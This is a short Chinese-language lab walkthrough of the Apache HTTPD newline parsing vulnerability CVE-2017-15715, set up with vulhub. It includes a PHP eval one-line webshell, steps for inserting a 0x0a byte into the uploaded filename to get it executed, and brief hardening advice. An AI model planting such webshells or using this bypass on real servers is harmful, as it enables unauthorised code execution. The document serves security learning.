Apache HTTPD 换行解析漏洞(CVE-2017-15715)
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
🍉 === shell
此环境来自vulhub工程:
https://github.com/vulhub/vulhub
以下测试环境为ubuntu 20.04
🍉目录
- Apache HTTPD 换行解析漏洞(CVE-2017-15715)
- 漏洞原理及环境部署
- 文件上传
- 蚁剑直连
- 加固
漏洞原理及环境部署
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,xxx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git
# 切换到相应漏洞路径
cd xxx/vulhub-master/httpd/CVE-2017-15715
# docker-compose部署该漏洞环境
docker-compose up -d
文件上传
访问http://ip:8080/,只有一个文件上传框,直接上传一句话木马
GIF89a<?=eval($_POST["root"]);?>
然后抓包
打开hex表,找到shell.php哪一行,右键0d选择插入byte
写入0a,然后确定
访问shell.php%0a,确认是否能解析
蚁剑直连
加固
- 别使用版本为2.4.0~2.4.29的Apache中间件
- Apache源码修改(不至于,不至于…)